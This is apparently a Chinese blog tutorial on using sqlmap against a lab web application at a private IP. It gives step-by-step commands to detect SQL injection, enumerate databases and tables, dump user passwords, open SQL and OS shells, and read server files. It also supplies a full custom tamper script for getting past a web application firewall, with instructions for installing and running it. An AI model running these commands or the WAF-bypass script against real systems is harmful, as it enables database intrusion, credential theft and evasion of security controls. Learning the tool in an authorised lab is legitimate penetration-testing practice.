前言
Sqlmap工具介绍
概念
官网:https://sqlmap.org/作用: sqlmap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入漏洞并接管数据库服务器。它有一个强大的检测引擎,许多适合于终极渗透测试的良好特性和众多的操作选项
注意:kali自带
使用实战
简单帮助:python sqlmap.py -h详细帮助:python sqlmap.py -hh清除缓存:python --purge
基本操作
检测漏洞:
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2'
查询当前数据库:
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --current-db
当前库有哪些表:
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' -D jrlt --tables
某表有哪些字段:
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' -D jrlt -T users --columns
列出内容(数据):
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' -D jrlt -T users -C password --dump
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' -D jrlt -T users -C name,password --dump
拓展操作
执行sql
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --sql-shell
select * from users
弱密码爆破
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --password
执行系统命令
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --os-shell
读取文件
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --file-read "D:e.txt"
Sqlmap绕过waf
基础测试(不成功)
先开启防火墙
sqlmap --purge
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --dbs
使用tamper
参考:https://github.com/w0x68y/bypassWAF/tree/master
新建passdog.py
# coding=UTF-8
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
if payload:
payload=payload.replace(" ","/*!*/")
payload=payload.replace("=","/*!*/=/*!*/")
payload=payload.replace("AND","/*!*/AND/*!*/")
payload=payload.replace("UNION","union/*!88888cas*/")
payload=payload.replace("#","/*!*/#")
payload=payload.replace("USER()","USER/*!()*/")
payload=payload.replace("DATABASE()","DATABASE/*!()*/")
payload=payload.replace("--","/*!*/--")
payload=payload.replace("SELECT","/*!88888cas*/select")
payload=payload.replace("FROM","/*!99999c*//*!99999c*/from")
payload=payload.replace('SLEEP(','sleep/**/(')
payload=payload.replace('super_priv','/*!29440/**/super_priv*/')
payload=payload.replace('and host=','/*!29440and*/host/*!11440=*/')
payload=payload.replace('LIKE USER()','like (user/**/())')
payload=payload.replace('CURRENT_USER()','CURRENT_USER/**/()')
payload=payload.replace('SESSION_USER()','SESSION_USER(%0a)')
return payload
上传到目录
cd /usr/share/sqlmap/tamper/
执行sqlmap
sqlmap --purge
sqlmap -u 'http://192.168.244.1/bbs/showmessage.php?id=2' --tamper=passdog.py --random-agent --dbs
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...